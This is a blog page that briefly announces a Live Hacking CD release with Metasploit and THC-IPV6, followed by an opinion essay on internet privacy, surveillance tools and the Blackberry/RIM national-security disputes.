The Metasploit framework, one of the new tools included with this release, can be used to test your network using the framework's internal database of known weaknesses and exploits. Also included in this new release of the Live Hacking CD is THC-IPV6, a set of tools to attack the inherent protocol weaknesses of IPv6 and ICMP6.
See http://LiveHacking.com for more details.
From my point of view, there is no privacy as long as a user is connected to the Internet or a public network. Public networks such as the Internet, PSTNs and cellular networks are part of national and international telecommunication networks. These are the channels in which information flows from one side of the world to the other along with radio and satellite communications.
Currently, the Internet is one of the best communication channels available due to its capability, speed and cost. At the same time, it is the perfect place for the criminally minded to commit crimes or play under the radar. Because of this, the Internet is a place where the end-user needs to watch his/her activities and the law enforcement agencies need to watch the end-user. This paradox has created two market segments for software vendors, one to protect the end-user and other to violate the end-user’s privacy.
There are many often contradictory or complementary paradigms in IT security. Tools such as anti-virus, personal firewalls and private browsing functions are common examples of end-user privacy protection. But tools and appliances such as content monitoring systems, network traffic analyzers, data aggregators and cyber forensic tools can be used to violate end-user’s privacy.
The above mentioned tools have been built by engineers and IT practitioners. The functionality and the quality of these tools can be misjudged: it has been known for engineers to change the functionality of a tool under political pressure from governmental regulatory authorities. But the end-user, who relies on these tools or functions to enhance their online security, has no idea about such influences and pressures.
A recent research report about the private browsing functionality of the common Internet browsers is a good example. Millions of users trust the privacy mode on their browser, but the report shows that none of them are functioning at 100%, and it seems that nobody can be held accountable.
There has been lots of recent news and articles about Blackberry service suspensions. India, the United Arab Emirates, Kuwait and the Kingdom of Saudi Arabia are all countries with national security concerns. These countries work to defend their national security interests, as do the USA and other western countries. It is important to respect such decisions and their requirements as long as other western countries or technology owners reserve the right to do the same.
All Research In Motion (RIM) facilities are in western countries and all the communication data is sent over the Internet and the Blackberry network. Although data communications are encrypted within the Blackberry network, they can be aggregated at RIM's facilities. Furthermore, those countries which host RIM facilities have the legal right to access RIM's premises and cryptography algorithms for national security or regular monitoring.
Some countries, like the UAE, use Blackberry devices widely in their governmental institutions, which raises questions about access to data that has been transferred over the RIM network, especially with regard to criminal investigations and national security protection.
However the Blackberry is not alone. We should not forget other services such as the Nokia Messaging Service. This service is Nokia-hosted for Nokia devices. With one Nokia device, users can manage all their email, IM and social networking accounts. In other words, it provides services similar to that of RIM’s, but only for Nokia users.
It is obvious that if RIM is a threat to national security because of its cloud network and infrastructure, then similar services such as the Nokia Messaging Service have the same issues.
© Copyright 2005 - 2012 Ali Jahangiri · All Rights Reserved ·